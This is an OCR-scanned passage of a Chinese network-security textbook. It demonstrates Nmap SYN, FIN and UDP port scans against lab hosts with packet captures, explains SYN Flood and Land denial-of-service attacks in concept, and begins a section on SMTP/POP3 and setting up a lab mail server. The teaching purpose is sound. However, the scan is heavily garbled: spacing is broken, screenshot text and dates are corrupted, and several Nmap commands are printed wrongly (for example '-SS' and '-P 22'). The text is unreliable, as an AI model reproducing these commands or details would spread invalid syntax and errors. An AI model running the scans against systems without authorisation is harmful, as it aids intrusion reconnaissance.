口 是 关 闭 的 ;如 果 目 标 主机 回 送 第 二 次 握手 的 报 文 段 , 说 明 目 标 主 机 21 端口 处 于 开放 状 

。 那 么 ,扫描 主机 已 经 知道 对 方 21 端口 是 开放 的 ,就 不 必 再 建立 连接 了 ,因此 ,扫描 主 
机 就 回 送 一 个 RST 报 文 段 ,来 关闭 这 个 TCP 连接 。 

我 们 使 用 Nmap 扫描 配合 Sniffer 抓 包 的 方法 验证 TCP SYN 端口 扫描 原理 。 在 


Zenmap 窗口 输入 命令 : 


nmap -SS -p 21 192.168.111.3 


这 里 -sS 表示 TCP 
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扫描 结束 ,得 到 目标 主机 的 21 端口 是 开放 的 端口 ( 见 图 8-27)。Sniffer 停止 抓 包 , 看 
到 已 经 捕 提 了 三 个 TCP 包 ( 见 图 8-28) ,可 以 分 析出 使 用 TCP SYN 扫描 的 通信 过 程 。 在 
21 端口 开放 的 状态 下 ,发 起 扫描 主机 向 目标 主机 的 21 端口 ,发送 第 一 次 握手 报 文 段 , 目 
标 主 机 回 送 第 二 次 握手 的 报 文 段 ,说 明 目 标 主机 的 21 端口 是 开放 的 端口 。 然 后 ,扫描 主 
机 回 送 一 个 RST 报 文 段 , 关 闭 这 个 TCP 半 连 接 。 


Scan Toos Profle Help 
Target; | 192.168.111.3 加 Profile: es 


Command; |nmap -5S -p 21 192.168.111.3 


Nosts || Services Nnap Output |Ports / Hosts| Topology| Host Details| Scans| 
map -sS -p 21 192.168.111.3 国 | 3 可 


0 4 Host ~ 
和 192.168.111.3 


Starting Nnap 5.51 ( http://nuap.org ) ac 2012-08-22 14:03 
中 国标 准时 间 

Nhap scan report for 192.168.111.3 

mass_dns: warning: Unable to determine any DNS servers, 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.00s latency). 

PORT 。 STATE SERVICE 

21/tcp open ftp 

MRC Rddress: 90:0C:29:C8:17:3D (VMware) 


map done: 1_ IP address (1 host up) scanned in 0.64 seconds 


图 8-27 Nmap 使 用 TCP SYN 扫描 目标 主机 的 开放 端口 


[192.168.111.1]| [192.168.111.3]|TCP: D=21 S=44032 SYN SEQ=4150508519 IEN=0 VIN=2048 
[192.168.111.3] [192.168.111.1] TCP: D=44032 S=21 SYN ACK=4150508520 SEQ=1811122058 LEN=0 VIN=64240 
192 .168.111.1] [192 .168 .111.3] TCP: D=21 S=44032 RST VIN=0 


图 8-28 使 用 Sniffer 捕 提 TCP SYN 扫描 目标 主机 开放 端口 的 通信 过 程 


接着 使 用 TCP 半 连 接 扫描 进行 关闭 端口 的 扫描 。 重 新 启动 Sniffer 开始 抓 包 ,在 
Zenmap 窗口 输入 同样 的 TCP SYN 端口 扫描 命令 : 
Dap =- SS =p 21 192.168.111.3 


得 到 扫描 结果 ( 见 图 8-29) ,显示 21 端口 是 关闭 的 。 


© Zenmap 
Scan Ioos Profile Help 
Target: |192.168.111.3 司 | Profile: 习 Es) Cancel 


Command: |nmap -sS -p 21 192.168.111.3 


Hosts ]| Services Hnap Output |Ports / Hosts| Topology| Host Details| Scans| 
ms ist ~ mmap -ss -p 21 192.168.111.3 国 3 [| 


0 192.168.111.3 
Starting Nnap 5.51 ( http://nnap.org ) ac 2012-08-22 14:06 
中 国标 准时 间 

Nnap scan report for 192.168.111.3 

mass_dns: warning: Unable to determine any DNS servers. 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.00s latency). 

PORT STATE SERVICE 

21/tcp closed ftp 

HAC Address:_00:0C:29:C8:17:3D 【VMware) 


Nhap done: 1_IP address (1 host up) scanned in 0.64 seconds 


图 8-29 Nmap 使 用 TCP SYN 扫描 目标 主机 的 关闭 端口 
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Sniffer 停止 抓 包 ,看 到 已 经 捕 提 了 两 个 TCP 包 ( 见 图 8-30) 。 


[192.168 Tr 168.111.3] TCP: D=21 S=60438 SYN SEQ=3895993343 LEN=0 WIN=2048 
192.168.111.3]|[192.168.111.1]ITCP: D=60438 S=21 RST ACK=3895993344 WIN=0 


图 8-30 使 用 Sniffer 捕捉 TCP SYN 扫描 目标 主机 关闭 端口 的 通信 过 程 


这 就 是 TCP SYN 扫描 。TCP SYN 扫描 TCP 连接 的 三 次 握手 未 完全 建立 ,所 以 这 
种 扫描 技术 被 称 为 半 连 接 扫描 。TCP 半 连 接 扫描 相 比 TCP 全 连接 扫描 ,扫描 速度 有 了 
一 定 的 提高 ,但 它 存在 一 个 缺点 是 ,就 是 向 目标 主机 发 送 大 量 伪造 的 TCP 半 连 接 请 求 , 会 
导致 目标 主机 资源 耗 尽 。 因 而 ,有 许多 防火 墙 软件 对 TCP 半 连 接 进行 过 滤 , 所 以 使 用 
TCP SYN 扫描 并 不 能 总 是 好 用 。 

第 三 种 TCP 端口 的 扫描 方法 是 TCP FIN 扫描 ( 见 图 8-31) ,利用 的 是 释放 TCP 连接 
四 次 挥手 的 终止 比特 FIN。 当 扫描 主机 通过 8001 端口 向 目标 主机 21 端口 发 送 一 个 FIN 
报 文 段 ,也 就 是 释放 TCP 连接 的 第 一 次 挥手 报 文 段 ,如 果 目 标 主机 21 端口 是 关闭 的 ,这 
个 FIN 报 文 段 会 被 丢弃 掉 , 然 后 目标 主机 返回 一 个 RST 报 文 段 ; 如 果 目 标 主机 21 端口 
是 开放 的 ,但 是 目标 主机 发 现 并 未 和 发 送 FIN 报 文 段 的 客户 端 主机 建立 TCP 连接 ,也 就 
不 可 能 有 TCP 连接 去 释放 ,因此 ,这 个 FIN 报 文 段 会 被 丢掉 ,并 且 不 会 返回 RST 报 文 
段 , 目 标 主机 是 无 响应 的 。 过 一 段 时 间 ,客户 机 会 再 发 送 一 个 FIN 报 文 段 ,目标 主机 也 是 
无 响应 。 说 明 目 标 主机 这 个 端口 是 开放 的 。 扫 描 主机 就 通过 是 否 有 RST 报 文 段 返回 ,来 
判定 目标 主机 是 否 开放 21 端口 。 


客户 端 目标 机 客户 端 目标 机 
端口 号 端口 号 端口 号 端口 号 

8001 21 8001 21 
m ”号 

FIN rN | 

RST 
无 响应 
目标 机 开放 21 端 口 目标 机 未 开放 21 端 口 


图 8-31 TCP FIN 扫描 目标 主机 的 TCP 端口 


但 是 ,也 存在 一 些 操作 系统 (比如 Windows 系统 ) , 当 扫描 主机 发 送 一 个 FIN 报 文 段 
时 ,不 管 它 的 端口 是 否 打 开 , 都 回复 一 个 RST 报 文 段 ,在 这 种 情况 下 ,TCP FIN 扫描 方法 
就 不 适用 了 。 

我 们 还 是 使 用 Sniffer 抓 包 的 形式 验证 Nmap 的 TCP FIN 扫描 的 通信 过 程 。 假 设 目 
标 主机 使 用 Windows 系统 ,并 且 21 端口 开放 。 启 动 Sniffer 开始 抓 包 , 在 扫描 主机 的 
Zenmap 窗口 输入 命令 : 


nmap -sF-p 21 192.168.111.3 
这 里 -sF 表示 TCP 的 Fin 扫描 。 扫 描 结 束 .得 到 目标 主机 21 端口 是 关闭 的 ( 见 
图 8-32) 。 但 是 ,21 端口 是 开放 的 端口 ,为 什么 这 里 扫描 成 关闭 的 端口 呢 ? 通过 分 析 
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Sniffer 捕 提 的 数据 包 ( 见 图 8-33), 可 以 看 到 当 扫 描 主 机 发 送 一 个 FIN 报 文 段 时 ,目标 主 
机 的 Windows 操作 系统 不 管 端 口 是 否 打开 都 回复 一 个 RST 报 文 段 ,因此 ,我 们 看 到 使 用 
Namp 的 FIN 扫描 不 适用 于 扫描 操作 系统 是 Windows 的 目标 主机 。 


Scan Iooks Profle Heip 
Target: |192.168.111.3 ~ ES 
Commani: [mmap -sF -p 21 192.168.111.3 


Josts | Services Hnap Output 


[ms -sF -p 21 192.168.111.3 v peaizs] 


0S 4 Host 一 : 
佑 ”192.168.111.3 


Starting Nnap 5.51 ( hrtp://mmap.org ) at 2912-98-22 14:11 
中 国标 准时 间 


Nnap scan report for 192.168.111.3 
mass_dns: warning: Unable to determine any DNS servers. 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.00s latency). 

PORT STATE SERVICE 

21/tcp closed ftp 

NMAC Address: 00:0C:29:C8:17:3D (VMware) 


Nnap done: 1 IP address (1 host up) scanned in 0.63 seconds 


图 8-32 ”Nmap 使 用 TCP FIN 扫描 Windows 主机 


[192.168.111.1] [192.168.111.3]|TCP: D=21 S=52687 FIN SEQ=2426478732 LEN=0 WIN=3072 
192.168 .111.3]![192.168.111.1]ITCP: D=52687 S=21 RST ACK=2426478733 WIN=0 


图 8-33 使 用 Sniffer 捕捉 TCP FIN 扫描 Windows 主机 的 通信 过 程 


TCP FIN 扫描 对 Linux 操作 系统 有 效 。 假 设 目标 主机 使 用 Linux 操作 系统 ,启动 
Sniffer 开始 抓 包 ,在 扫描 主机 的 Zenmap 窗口 ,输入 命令 


nmap -SF -P 22 192.168.111.4 


扫描 结束 ,得 到 目标 主机 22 端口 是 开放 的 端口 ( 见 图 8-34) 。Sniffer 停止 抓 包 , 可 以 


Scan _Iooks_Broflle_Hep 


Target: | 192.168.111.4 避 Profile: 司 EEo Cancel 


Conmand: |map -sF -p 22 192.168.111.4 


Nosts ][ Services Hnap Output |Ports / Hosts| Topology| Host Detailsj Scans| 
08 4 |loat me -sF -p 22 192.168.111.4 国 | 3 EE 可 
姑 192.168.111.3 


Starting Nnap 5.51 ( http://nmap.org ) at 2012-08-22 15:10 
锣 192.168.111,.4 中 国标 准时 间 


Nnap scan report for 192.168.111.4 
mass_dns: warning: Unable to deternine any DNS servers. 
Reverse DNS is disabled. Try using --aystem-dns or specify 
valid servers with --dns-servers 

Host is up (0.00s latency). 

PORT ”STATE SERVICE 

227tcp open|filtered ssh 

MAC Address: :29:59:30:87 【VMware) 


Nnap done: 1 IP address (1 host up) scanned in 0.44 seconds 


图 8-34 Nmap 使 用 TCP FIN 扫描 Linux 主机 的 开放 端口 
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看 到 已 经 捕捉 了 两 个 TCP 包 ( 见 图 8-35)。 在 22 端口 开放 的 状态 下 , 扫描 主机 向 目标 主 
机 的 22 端口 发 送 第 一 次 挥手 报 文 段 。 由 于 目标 主机 的 22 端口 是 开放 的 ,可 以 看 到 扫描 
主机 连续 发 送 两 个 FIN 报 文 段 ,而 目标 主机 两 次 都 没有 响应 。 


[192.168.111.1]|[192.168.111.4]|TCP: D=22 S=42002 FIN SEQ=1379820563 IEN=0 WIN=2048 
1392.168.111.1][1392.168 .111.4]LTCPE: D=22 S=42003 FIN SEQ=1379886098 LEN=0 WIN=2048 


图 8-35 使 用 Sniffer 捕 提 TCP FIN 扫描 Linux 主机 开放 端口 的 通信 过 程 


对 比 图 8-33 和 图 8-35, 可 以 得 到 结论 : 使 用 TCP FIN 扫描 目标 主机 的 开放 端口 ,对 
Linux 操作 系统 有 效 ,而 对 Windows 操作 系统 无 效 。 


842 UDP 端口 扫描 


由 于 UDP 是 无 连接 的 协议 ,因此 ,不 能 像 TCP 那样 使 用 三 次 握手 建立 连接 。Nmap 
扫描 UDP 端口 的 方法 是 : 构造 一 个 内 容 为 空 的 UDP 用 户 数据 报 , 发 送 给 目的 主机 的 
UDP 端口 。 例 如 ,扫描 主机 通过 8001 端口 探测 目标 主机 的 UDP 端口 69(tftp 服务 的 端 
口 ) 是 否 开放 ( 见 图 8-36) 。 若 目标 主机 的 69 端口 是 开放 的 , 则 目标 主机 没有 响应 ,不 返回 
任何 信息 ,说 明 目 标 主机 的 69 端口 是 开放 的 。 若 目标 主机 的 69 端口 处 于 关闭 状态 , 则 目 
标 主机 返回 一 个 ICMP 差错 报告 报 文 ,表示 目标 主机 的 69 端口 是 关闭 的 。 


客户 端 目标 机 客户 端 目标 机 
端口 号 端口 号 端口 号 端口 号 
8001 69 8001 69 
= 
i UDP 
无 响应 
目标 机 开放 69 端 口 目标 机 未 开放 69 端 口 


图 8-36 扫描 目标 主机 的 UDP 端口 


我 们 使 用 Nmap 扫描 配合 Sniffer 抓 包 的 方法 验证 Nmap 的 UDP 端口 扫描 原理 。 扫 
描 主 机 启动 Sniffer 开始 抓 包 。 在 Zenmap 窗口 输入 命令 : 


nmap -sU-p69192.168.111.3 


这 里 -sU 表示 UDP 端口 扫描 。 

扫描 结束 ,得 到 目标 主机 的 69 端口 是 开放 的 端口 ( 见 图 8-37)。Sniffer 停止 抓 包 , 清 
晰 看 到 已 经 捕捉 了 两 个 UDP 包 ( 见 图 8-38)。 通 过 这 两 个 数据 包 , 可 以 分 析出 UDP 端口 
扫描 的 通信 过 程 ,扫描 主机 构造 UDP 用 户 数据 报 发 送 给 目标 主机 的 UDP 端口 69 ,目标 
主机 没有 响应 ,不 返回 任何 信息 。 扫 描 主机 连续 构造 两 个 UDP 用 户 数据 报 发 送 给 目标 
主机 的 69 端口 ,目标 主机 都 是 没有 任何 响应 ,说明 目 标 主机 的 69 端口 是 开放 的 。 

接着 ,使 用 Nmap 扫描 关闭 的 UDP 端口 。Sniffer 重新 开始 抓 包 , 在 Zenmap 窗口 输 
入 同样 的 UDP 端口 扫描 命令 : 
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nmap -sU-p 69 192.168.111.3 
得 到 扫描 结果 ( 见 图 8-39) ,69 端口 为 关闭 的 UDP 端口 。Sniffer 停止 抓 包 ,可 以 看 到 已 经 
捕捉 了 两 个 UDP 包 ( 见 图 8-40)。 在 端口 关闭 状态 下 ,目标 主机 返回 一 个 ICMP 差错 报 
告 报 文 ,表示 目标 主机 的 69 端口 是 关闭 的 。 


Scan Iools Profle Help 


Target; |192.168.111.3 Profile: ~ Ey Cancel 
Conmand: |map -sU -p 69 192.168.111.3 

[Hosts |[ Services Jap Output |Ports / Hosts| Topology| Host Details| Scans| 

ee ~ Jrmap -sv -p 69 192.168.111.3 国 Fed] 


各 192.168.111.3 
Starting Nnap 5.51 ( http://nmap.org ) ar 2012-08-22 14:33 


中 国标 准时 间 

Nnap scan report for 192.168.111.3 

mass_dns: warning: Unable to determine any DNS servers. 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.015s latency). 

PORT STATE SERVICE 

69/udp open|filtered tftp 

NAC Address: 00:0C:29:C8:17:3D (Viware) 


Nnap done: 1_IP address (1 host up) scanned in 0.95 seconds 


图 8-37 Nmap 使 用 UDP 扫描 目标 主机 的 开放 端口 


[192.168.111.1]|[192.168.111.3] UDP: D=69 S=49768 
[192.168.111.1]|[192.168.111.3] : 


图 8-38 使 用 Sniffer 捕 提 扫描 开放 的 UDP 端口 的 通信 过 程 


Scan Toos Profle Help 


Target: |192.168.111.3 司 Profile: 司 Es) [cancel 
Command: [mmap -sU -p 69 192.168.111.3 


Hosts |[ Services Ynap Output [Ports / Hosts| Topology| Host Details| Scans| 


map -su -p 69 192.168.111.3 ~ 


三 |Details 


Starting Nnap 5.51 ( http://nnap.org ) at 2012-08-22 14:39 
中 国标 准时 间 

Nnap scan report for 192.168.111.3 

mass_ dns: warning: Unable to determine any DNS servers. 
Reverse DNS is disabled. Try using --systen-dns or specify 
valid servers with --dns-servers 

Host is up (0.0019s latency). 

PORT STATE SERVICE 

69fudp closed tirp 

HAC Address:_00:0C:29:C8:17:3D (YHware) 


0S 4 Host a 
杂 192.168.111.3 


Nnap done: 1_IP address {1 host up) scanned in 0.72 seconds 


图 8-39 Nmap 使 用 UDP 端口 扫描 目标 主机 的 关闭 端口 


[192.168.111.1] [192.168.111.3]|UDP: D=69 S=60126 LEN=8 
[192.168.111.3]|[192.168.111.1]| 专 赤 :ICMP Port Unreachable 
ICMP: Destination unreachable (Port unreachable) 


图 8-40 ”使 用 Sniffer 捕捉 扫描 关闭 的 UDP 端口 的 通信 过 程 
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8 .5 SYN Flood 攻击 和 Land 攻击 


在 8.3 节 中 介绍 了 正常 情况 下 建立 TCP 连接 三 次 握手 的 过 程 ,但 是 假如 客户 端 向 服 
务 嚣 发送 了 第 一 次 握手 的 报 文 段 后 ,突然 死机 或 掉 线 , 那 么 服务 器 端 在 发 出 第 二 次 握手 的 
确认 报 文 段 后 ,是 无 法 收 到 客户 端的 第 三 次 握手 的 报 文 段 的 ,因此 ,建立 TCP 连接 的 三 次 
握手 无 法 完成 。 在 这 种 情况 下 ,服务 器 端 一 般 会 重 试 , 再 次 发 送 第 二 次 握手 的 报 文 段 给 客 
户 端 ,并 在 等 待 一 段 时 间 后 ,丢弃 这 个 未 完成 的 TCP 连接 ,这 段 等 待 时 间 大 约 为 
30s~2min。 

对 于 服务 器 来 说 ,一 个 客户 端 出 现 异常 ,导致 服务 器 一 个 进程 等 待 半分 钟 、1 分 钟 , 并 
不 是 什么 大 问题 。 但 是 ,如 果 有 一 个 黑客 向 目标 主机 发 送 大 量 伪 造 源 IP 地 址 的 第 一 次 握 
手 的 报 文 段 。 目 标 主机 收 到 伪造 报 文 段 后 ,分 别 回 送 相应 的 第 二 次 握手 的 报 文 段 。 由 于 
黑客 主机 发 送 的 第 一 次 握手 报 文 段 的 源 IP 地 址 是 虚假 的 ,所 以 目标 主机 不 可 能 得 到 第 三 
次 握手 的 报 文 段 ,因此 ,目标 主机 会 再 次 大 量 回 送 第 二 次 握手 报 文 段 ,然后 等 待 一 段 时 间 ， 
直到 超时 。 在 这 种 情况 下 ,目标 主机 为 了 维护 一 个 数量 非常 大 的 TCP 半 连 接 列 表 , 而 消 
耗 非常 多 的 资源 。 这 些 数 以 万 计 的 TCP 半 连 接 列表 ,即使 是 简单 的 保存 也 会 消耗 非常 多 
的 CPU 时 间 和 内 存 , 何 况 还 要 不 断 重复 地 向 这 个 列表 中 的 IP 地 址 发 送 第 二 次 握手 的 报 
文 段 。 如 果 目 标 主 机 系统 不 够 强大 ,就 会 很 快 出 现 堆栈 溢出 ,系统 崩溃 。 即 使 目标 主机 系 
统 足 够 强大 ,也 会 忙于 处 理 攻击 者 伪造 的 TCP 连接 请 求 , 而 无 暇 理 皮 正常 的 客户 请 求 。 
这 种 攻击 称 做 目标 主机 受到 了 SYN Flood 攻击 (SYN 洪水 攻击 ) 。 

SYN Flood 攻击 利用 TCP 三 次 握手 协议 缺陷 ,向 目标 主机 发 送 大 量 的 伪造 源 地 址 的 
SYN 连接 请 求 , 来 消耗 目标 主机 的 资源 ,从 而 使 目标 主机 不 能 为 正常 用 户 提供 服务 。 
SYN Flood 攻击 属于 拒绝 服务 攻击 的 一 种 。 

利用 TCP 三 次 握手 的 缺陷 进行 的 黑客 攻击 ,除了 SYN Flood 攻击 外 ,还 有 Land 攻 
击 。Land 攻击 是 攻击 者 向 目标 主机 发 送 大 量 伪造 的 第 一 次 握手 的 报 文 段 , 它 和 SYN 
Flood 攻击 不 同 的 是 SYN Flood 攻击 的 源 IP 地 址 是 伪造 的 ,而 Land 攻击 报 文 段 中 源 地 
址 和 目的 地 址 都 是 目标 主机 的 IP 地 址 。 这 样 ,就 会 让 目标 主机 向 自己 回 送 第 二 次 握手 的 
报 文 段 ,导致 在 第 三 次 握手 时 自己 又 给 自己 回 一 个 报 文 段 , 建 立 自己 与 自己 的 连接 ,是 一 
个 空 连接 。 每 一 个 这 样 的 连接 都 保留 着 , 直到 超时 。 这 样 ,大 量 无 效 连接 达到 一 定数 量 
时 ,就 会 拒绝 新 的 正常 客户 的 连接 请 求 。 对 Land 攻击 ,不同 的 操作 系统 的 反应 是 不 同 的 ,对 
于 UNIX 或 Linux 操作 系统 ,系统 会 骨 溃 ,而 Windows 操作 系统 就 会 变 得 极其 缓慢 。 


1. TCP 与 UDP 各 自 的 优 缺点 是 什么 ? 
2. TCP 首部 中 的 序列 号 字段 起 什么 作用 ? 
3. Namp 软件 哪 种 TCP 扫描 方式 速度 最 快 ? 
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SMTP/POP3 及 DNS 协议 


9.1 邮件 协议 概述 


电子 邮件 是 因特网 上 使 用 最 多 的 和 最 受 欢 迎 的 一 种 应 用 。 因 特 网 发 送 邮 件 的 正式 标 
准 是 简单 邮件 传送 协议 (Simple Mail Transfer Protocol,SMTP) ,因特网 读 取 邮件 的 常用 
协议 是 邮局 协议 POP(Post Office Protocol) 的 第 3 个 版 本 POP3 。 

一 个 电子 邮件 系统 具有 如 图 9-1 所 示 的 三 个 主要 组 成 构件 ,这 就 是 用 户 代 理 .邮件 服 
务 器 和 电子 邮件 使 用 的 协议 ,如 SMTP 和 POP3。 用 户 代理 就 是 用 户 与 电子 邮件 系统 的 
接口 ,在 大 多 数 情况 下 它 就 是 在 用 户 PC 中 运行 的 程序 。 用 户 代 理 使 用 户 能 够 通过 一 个 
很 友好 的 窗口 来 发 送 和 接收 邮件 。 现 在 可 供 大 家 选择 的 用 户 代 理 有 很 多 种 。 例 如 ,微软 
公司 的 Outlook Express 和 我 国 张 小 龙 制作 的 Foxmail, 都 是 很 受 欢迎 的 电子 邮件 用 户 


代理 。 
(发 送 邮件 ) (发 送 邮件 ) ( 读 取 邮 件 ) 
户 SMTP 邮件 SMTP 邮件 POP3 户 
入 | CTCP 和 连接 ) 服务 器 (TCP 连 接 ) 服务 器 / (rcp 连接 ) | 仿 


发 送 方 (发 送 邮件 ) 接收 方 


SMIE (发 送 邮件 ) 
SMTP 
(TCP 连 接 ) 
用 户 代理 
户 代理 
邮件 缓存 发 送 端 接收 庙 
邮件 服务 器 邮件 服务 器 


图 9-1 电子 邮件 最 主要 的 组 成 构件 


邮件 服务 是 电子 邮件 系统 的 核心 构件 ,因特网 上 所 有 的 ISP 都 有 邮件 服务 器 。 邮 件 
服务 器 的 功能 是 发 送 和 接收 邮件 。 邮 件 服务 器 按照 客户 服务 器 的 方式 工作 。 邮 件 服务 器 
需要 使 用 两 个 不 同 的 协议 。 一 个 协议 用 于 发 送 邮 件 , 即 SMTP ,而 另 一 个 协议 用 于 接收 邮 
件 , 即 POP3。 一 个 邮件 服务 器 既 可 以 作为 客户 ,也 可 以 作为 服务 器 。 当 邮件 服务 器 A 向 
邮件 服务 器 B 发 送 邮 件 时 ,邮件 服务 器 A 就 作为 SMTP 客户 ,而 邮件 服务 器 B 是 SMTP 
服务 器 。 当 邮件 服务 器 A 从 另 一 个 邮件 服务 器 B 接收 邮件 时 ,邮件 服务 器 A 就 作为 
SMTP 服务 器 ,而 邮件 服务 器 B 是 SMTP 客户 。 
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下 面 就 是 一 封 电子 邮件 的 发 送 和 接收 过 程 。 

发 信人 调用 用 户 代理 编辑 要 发 送 的 邮件 。 用 户 代理 用 SMTP 将 邮件 传送 给 发 送 端 
邮件 服务 器 。 

发 送 端 邮件 服务 器 把 邮件 放 入 邮件 缓存 队列 中 ,等 待 发 送 。 

运行 在 发 送 端 邮件 服务 器 的 SMTP 客户 进程 ,发 现在 邮件 缓存 中 有 待 发 送 的 邮件 ， 
就 向 运行 在 接收 端 邮件 服务 器 的 SMTP 服务 器 进程 发 起 TCP 连接 的 建立 。 

当 TCP 连接 建立 后 ,SMTP 客户 进程 开始 向 远程 的 SMTP 服务 器 进程 发 送 邮 件 。 
如 果 有 多 个 邮件 在 邮件 缓存 中 , 则 SMTP 客户 一 一 把 它们 发 送 到 远程 的 SMTP 服务 器 。 
当 所 有 的 待 发 送 邮 件 发 完了 ,SMTP 就 关闭 所 建立 的 TCP 连接 。 

运行 在 接收 端 邮件 服务 器 中 的 SMTP 服务 器 进程 收 到 邮件 后 ,把 邮件 放 入 收 信人 的 
用 户 邮 箱 中 ,等 待 收 信 人 在 他 方便 时 进行 读 取 。 

收 信人 在 打算 收 信 时 ,调用 代理 使 用 POP3 把 自己 的 邮件 从 接收 邮件 服务 器 的 用 户 
邮箱 中 取 回 。 


9.3 搭建 电子 邮件 服务 器 


下 面 介 绍 如 何 搭建 一 个 邮件 服务 器 及 其 配置 方法 。 这 里 选择 三 台 主 机 : 主机 和 A、 主 
机 B 和 主机 C ,它们 各 自 的 IP 地 址 如 图 9-2 所 示 。 在 主机 A 安装 邮件 服务 器 ,并 分 配 两 
个 邮件 账户 Mike 和 Peter, 邮 件 服务 器 的 域名 都 是 ccpc. com。 然 后 ,在 主机 B 使 用 Mike 
账户 给 主机 C 的 Peter 账户 发 送 电子 邮件 。Mike 发 送 的 电子 邮件 被 传递 到 邮件 服务 器 
并 保存 到 Peter 邮箱 中 这 个 过 程 使 用 SMTP。 然 后 ,Peter 登录 自己 邮箱 把 邮件 下 载 下 
来 ,这 个 接收 邮件 的 过 程 使 用 的 协议 是 POP3 。 


主机 A 邮件 服务 器 
192.168.111.3 mike@ccpc.com 


村 peter@ccpc.com 


< 一 : 


主机 B 主机 C 
192.168.111.1 192.168.111.2 
mikeQ@ccpc.com 一 一 peterQ@ccpc.com 


图 9-2 搭建 邮件 服务 器 


我 们 使 用 易 邮 这 个 简单 的 邮件 服务 器 软件 ,基本 的 邮件 服务 器 功能 它 都 有 。 安 装 易 
邮 到 主机 A 上。 安装 完 成 后 , 易 邮 邮件 服务 器 会 自动 启动 ,屏幕 右 下 角 有 易 邮 邮件 服务 
器 的 小 图 标 。 在 主机 A 上 用 netstat -an 命令 查看 ,会 发 现 SMTP 使 用 的 端口 25 和 
POP3 使 用 的 端口 110 都 已 经 开放 ( 见 图 9-3) 。 
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FC: MWINDOTS\systen32\cad exe 0 

Proto Local hddress Foreign hddress State 

TCP B-B.B-B:7 目 -B-B-B:B LISTENING 
TCP 目 - 日 -日 -日 :9 目 - 日 -日 -日 :日 LISTENING 
TCP @.8.8.60:13 目 - 卓 -日 -日 :日 LISTENING 
TCP 昌 -B-B-B:17 上 日-B-B-B:B LISTENING 
TCP 日- 日 -日 -日 :19 日 -日 -B.B:B LISTENING 
TCP 8@.0.8.86:21 8.8.89.8:8 LISTENING 
TCP 日-B.B-B:25 8.8.9.8:8 LISTENING 
TCP -DB.B.B:42 上 日 -B-B.B:B LISTENING 
TCP .80.8.8:53 8.8.8.8:8 LISTENING 
TCP B-B.B.9:89 日 -日 -日 -日 :日 LISTENING 
TCP 8.9.8.8:118 上 -B-B-B:B LISTENING 
TCP 日 .B.B.B:135 目 - 昌 -DB.B:B LISTENING 
TCP 日 .DB.B.B:445 昌 -B-B.B:B LISTENING 
TCP 昌 .B.B-B:554 8.8.8.8:8 LISTENING 


图 9-3 查看 主机 开放 的 端口 25 和 110 


在 易 邮 邮件 服务 器 的 窗口 中 , 单 击 * 设 置 ?按钮 ,为 邮件 服务 器 设置 一 个 单 域名 ccpc. 
com。 如 图 9-4 所 示 , 复 选 框 “ 支 持 ESMTP 协议 ”表示 易 邮 邮件 服务 器 可 以 支持 
ESMTP,ESMTP 是 一 个 扩展 的 SMTP。 由 于 SMTP 有 漏洞 , 它 是 以 明文 方式 传递 邮件 
的 账户 和 密码 ,这 样 账户 密码 很 容易 被 窃取 ,而且 使 用 SMTP 发 送 邮 件 , 邮 件 服务 器 对 发 
件 人 身份 不 认证 ,这 样 会 导致 邮件 能 被 伪造 。 为 了 解决 这 个 问题 ,就 出 现 了 ESMTP。 
ESMTP 对 发 件 人 身份 会 经 过 认证 ,要 求 只 有 知道 Mike 账户 密码 的 人 才能 使 用 Mike 的 
邮件 账户 发 送 邮件 ,而 不 是 任何 人 都 能 以 Mike 身份 发 邮件 。 此 外 ,ESMTP 传送 的 账户 


密码 还 要 经 过 加 密 处 理 。 


[全 个 作为 局 域 网 邮件 服务 器 
[二 > | 个 作为 互联 网 邮件 服务 器 
个 作为 局 城 网 / 找 号 邮件 服务 器 
厂 支持 sr 厂 允许 邮件 代理 
厂 作为 机 服务 运行 
『 邮箱 域名 设置 
他 单 城 名 Fw Usesll 
区 个 多 域名 mz | 
编辑 | 
珊 隐 
wn | ml]| 


图 9-4 配置 邮件 服务 器 


人 们 收发 邮件 方式 一 般 使 用 I 下 浏览 器 ,很 少 使 用 Outlook 这 样 的 邮件 客户 端 。 
Outlook 收发 邮件 使 用 的 是 SMTP 和 POP3 ,而 IE 浏览 器 收发 邮件 使 用 HTTP。 易 邮 邮 
件 服务 器 对 这 两 种 收发 邮件 方式 都 支持 。 我 们 先 不 设置 支持 ESMTP 来 配置 易 邮 邮件 服 


务 器 。 


邮件 服务 器 安装 配置 完成 后 ,在 主机 A 上 就 自动 建立 了 一 个 邮件 服务 器 的 网 页 ( 见 
图 9-5)。 这 说 明 可 以 从 Web 访问 易 邮 邮件 服务 器 。 

在 本 机 从 Web 登录 易 邮 邮件 服务 器 ,注册 账户 Mike(Cmike@ccpc. com) ,注册 后 马上 登 
录 Mike 邮箱 。 易 邮 邮 箱 界 面 和 人 们 经 常 使 用 的 QQ 邮箱 .163 邮箱 类 似 ,如 图 9-6 所 示 。 
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/5 邮件 服务 器 软件 Weblail - Windows Internet Ezplorer 回回 加 | 


GO- http://192. 168.111.3/nail/inaex = 


文件 FE) 编辑 于 ) 查看 人 收藏 夹 ) 工具 YI) 帮助 中 


席 收藏 天 | 逢 邮件 服务 器 软件 ebllail 


新 用 户 ?马上 注册 ! 
由 号 


宣 码 


CE 到 


口 保 存 账 号 和 密码 


图 9-5 邮件 服务 器 主页 


/邮件 服务 器 软件 WebMail - Windows Internet Explorer 
GO-Ee 192 188. 111.3 EDIS ][5T- 
文件 中。 编 名 EE) 查看 中 收 蕊 丈 Q) 工具 GD) 帮助) 
爸 收 恋 天 。 | 病 邮件 服务 器 软件 evnil 


徐 妆 箱 使 用 藻 况 
日- 而 收 件 箱 T 
日 光 与 新 邮件 cad eg 
局 - 重 外 部 邮件 接收 
已 用 空间 =) 
学 Ee 您 已 经 使 用 OK (0%) 
Sa 收 件 箱 共有 邮件 0. 未 读 邮 件 0. 
| | 
全 草稿 箱 发 件 箱 | 共有 邮件 0, 已 经 使 用 了 0 K. 
侠 收 阅 箱 : 
命 垃 极 箱 草 萄 箱 | 共有 邮件 0, 已 经 使 用 了 0 K. 
申 地址 得 收 立 箱 | 共有 地 件 0, 已 经 使 用 0K 
中" 所 配置 pp = 
加 基本 信息 垃 极 箱 共有 邮件 0. 已 经 使 用 了 0 K 
Se [下 看 邮件 ][_ 返回 
加 基数 设置 
